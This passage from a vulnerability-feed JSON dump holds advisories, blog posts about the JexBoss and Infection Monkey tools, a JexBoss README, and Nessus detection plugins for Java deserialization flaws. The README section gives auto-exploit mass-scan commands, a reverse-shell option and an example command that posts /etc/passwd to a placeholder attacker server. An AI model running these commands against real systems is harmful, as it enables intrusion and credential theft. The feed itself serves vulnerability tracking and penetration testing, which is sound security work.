"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-05-30T00:00:00", "id": "CPAI-2018-0013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:45:13", "description": "An insecure deserialization vulnerability has been reported in Jenkins CI Server. This vulnerability is due to deserialization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path.", "cvss3": {}, "published": "2015-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins CI Server Commons-Collections Library Insecure Deserialization (CVE-2015-8103)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2017-02-20T00:00:00", "id": "CPAI-2015-1419", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestit": [{"lastseen": "2017-08-11T08:07:48", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on Java EXploitation like a Boss wording.\n\n\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts and objects state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, ie. taking the serialized data to rebuild it into the original object. This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. Another good news is that it JexBoss is Python 2 &amp; Python 3 compatible. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification &amp; EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2017-08-11T06:52:45", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "type": "pentestit", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) &amp; the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2023-06-23T15:18:52", "description": "JexBoss is a tool for testing and exploiting [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. \n \n**Requirements** \n\n\n * Python &gt;= 2.7.x\n * [urllib3](<https://pypi.python.org/pypi/urllib3>)\n * [ipaddress](<https://pypi.python.org/pypi/ipaddress>)\n \n**Installation on Linux\\Mac** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n**Installation on Windows** \nIf you are using Windows, you can use the [Git Bash](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [Python](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [Git for Windows](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands:\n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n**Features** \nThe tool and [exploits](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\nThe exploitation vectors are: \n\n\n * /admin-console\n * tested and working in JBoss versions 5 and 6\n * /jmx-console\n * tested and working in JBoss versions 4, 5 and 6\n * /web-console/Invoker\n * tested and working in JBoss versions 4, 5 and 6\n * /invoker/JMXInvokerServlet\n * tested and working in JBoss versions 4, 5 and 6\n * Application Deserialization\n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n * Servlet Deserialization\n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link)\n * Apache Struts2 CVE-2017-5638\n * tested in [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications\n * Others\n \n**Videos** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n \n\n\n * Exploiting JBoss Application Server with JexBoss\n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n \n \n**Screenshots** \n\n\n * Simple usage examples:\n \n \n $ python jexboss.py\n\n \n\n\n[](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss:\n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes:\n \n \n $ python jexboss.py -h\n\n * Network scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode:\n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations:\n\n[](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n**Reverse Shell (meterpreter integration)** \nAfter you exploit a JBoss server, you can use the own [jexboss](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. \n \n**Usage examples** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638)\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [cookies](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode:\n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options:\n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n**[Download JexBoss](<https://github.com/joaomatosf/jexboss>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-12-18T21:12:00", "type": "kitploit", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:23:35", "description": "The remote web server is running Apache TomEE 1.x prior to 1.7.4 or 7.x prior to 7.0.0-M3 and is affected by two RCE vulnerabilities :\n\n - A flaw exists in 'EjbObjectInputStream' that is triggered during the deserialization of Java serialized input in the binary stream. This may allow a remote attacker to execute arbitrary code. (CVE-2015-8581)\n - A flaw in the EJBd protocol that is triggered during the deserialization of crafted Java Objects. This may allow a remote attacker to execute arbitrary code. Exploitation requires that EJBd is enabled on an instance (the default setting) (CVE-2016-0779)", "cvss3": {}, "published": "2016-05-24T00:00:00", "type": "nessus", "title": "Apache TomEE 1.x < 1.7.4 / 7.x < 7.0.0-M3 Multiple RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8581", "CVE-2016-0779"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:tomee"], "id": "9323.PRM", "href": "https://www.tenable.com/plugins/nnm/9323", "sourceData": "Binary data 9323.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:20", "description": "The version of Adobe ColdFusion running on the remote Windows host is 11.x prior to update 13 or 2016.x prior to update 5. It is, therefore, affected by multiple vulnerabilities :\n\n - A Java deserialization flaw exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-11283, CVE-2017-11284)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in user's browser session.\n (CVE-2017-11285)\n\n - An unspecified flaw due to improper restriction of XML External Entity Reference. (CVE-2017-11286)", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "nessus", "title": "Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11283", "CVE-2017-11284", "CVE-2017-11285", "CVE-2017-11286"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/a:adobe:coldfusion"], "id": "COLDFUSION_WIN_APSB17-30.NASL", "href": "https://www.tenable.com/plugins/nessus/103194", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103194);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11283\",\n \"CVE-2017-11284\",\n \"CVE-2017-11285\",\n \"CVE-2017-11286\"\n );\n script_bugtraq_id(100708, 100711, 100715);\n\n script_name(english:\"Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)\");\n script_summary(english:\"Checks the hotfix files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe ColdFusion running on the remote Windows host is\n11.x prior to update 13 or 2016.x prior to update 5. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A Java deserialization flaw exists that allows an unauthenticated,\n remote attacker to execute arbitrary code. (CVE-2017-11283,\n CVE-2017-11284)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to\n improper validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially crafted request,\n to execute arbitrary script code in user's browser session.\n (CVE-2017-11285)\n\n - An unspecified flaw due to improper restriction of XML External\n Entity Reference. (CVE-2017-11286)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe ColdFusion version 11 update 13 / 2016 update 5 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:coldfusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"coldfusion_win_local_detect.nasl\");\n script_require_keys(\"SMB/coldfusion/instance\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"coldfusion_win.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversions = make_list('11.0.0', '2016.0.0');\ninstances = get_coldfusion_instances(versions); # this exits if it fails\n\n# Check the hotfixes and cumulative hotfixes\n# installed for each instance of ColdFusion.\ninfo = NULL;\ninstance_info = make_list();\n\nforeach name (keys(instances))\n{\n info = NULL;\n ver = instances[name];\n\n if (ver == \"11.0.0\")\n {\n info = check_jar_chf(name, 13);\n }\n\n else if (ver == \"2016.0.0\")\n {\n info = check_jar_chf(name, 5);\n }\n\n if (!isnull(info))\n instance_info = make_list(instance_info, info);\n}\n\nif (max_index(instance_info) == 0)\n exit(0, \"No vulnerable instances of Adobe ColdFusion were detected.\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port)\n port = 445;\n\nreport =\n '\\n' + 'Nessus detected the following unpatched instances :' +\n '\\n' + join(instance_info, sep:'\\n') +\n '\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xss:TRUE);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:55", "description": "The version of VMware vCenter / vRealize Orchestrator Appliance installed on the remote host is 4.2.x or 5.x or 6.x and includes the Apache Commons Collections (ACC) library version 3.2.1. It is, therefore, affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the ACC library. An unauthenticated, remote attacker can exploit this, by sending a crafted request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-01-06T00:00:00", "type": "nessus", "title": "VMware vCenter / vRealize Orchestrator Appliance 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2022-06-29T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator", "cpe:/a:vmware:vrealize_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2015_0009.NASL", "href": "https://www.tenable.com/plugins/nessus/87762", "sourceData": "#TRUSTED 7ad5b9e2ff8b277af2a20068a8cfb8bde8a6f9ae58de195d4e3d9f61d45d3998a1476b3368d628cd2f93e6be1d9cc26d4f2a582a30e3322b15341d7ceb7858869aa4584d21d4ae9429ba95667300aefc5480704e01e525c745033ec377381e0bf7ccbdf2e3acc14c678d7dc99f310340046144859145d257872dd189b3e8f30b304cb6fa6cb809f8dcea8d1ae2be03b590149b0464b9112cd1effe6a0f6a3b917a0f1f0304cfad9e5aefc6866eb00de9f1c2b3e44e1733abb8a2f3a4cbaad82cc8987bcc20cad38063653b0d4a285810e2a9176d539fc18ada4f24ff02cb626edee4a1de4b3c72b911b2423d98818f35df9b4e7a73c83091935f4788260d55adcbe8d041bc7f83eeac22406bc83fc2740ea5053ea0e01c3a2a7b1b62da4f5201e4a5de91a3b6cecad75dccf148fc44a47a35b16c298bad0f9f3ed9f3885282ebe3b9a9fe33026df9b9a10136eb63fc17c2d74ae8fdd507eb99b4b754be3016d77b1dad957e502de50378e4c8ca84a4f5155b9bc20e2b2a0979021ae751d7922c000c3559bdc430fca9fcf1da9d182a5a65fae8f0d91c391bc453a311fd1cf83be6a65ea5ad98ca975194b908a1ad99422de8d9b9a6fe05e26f61c21b091fa484dc1c73b4a5e5b49eb401399348c75f783d4016492dfe25edde0f576917251c4f92e8766d1429999eda5dc18e0496ec229623356d258dd5f524c97eca3d80401f\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87762);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_xref(name:\"VMSA\", value:\"2015-0009\");\n script_xref(name:\"IAVB\", 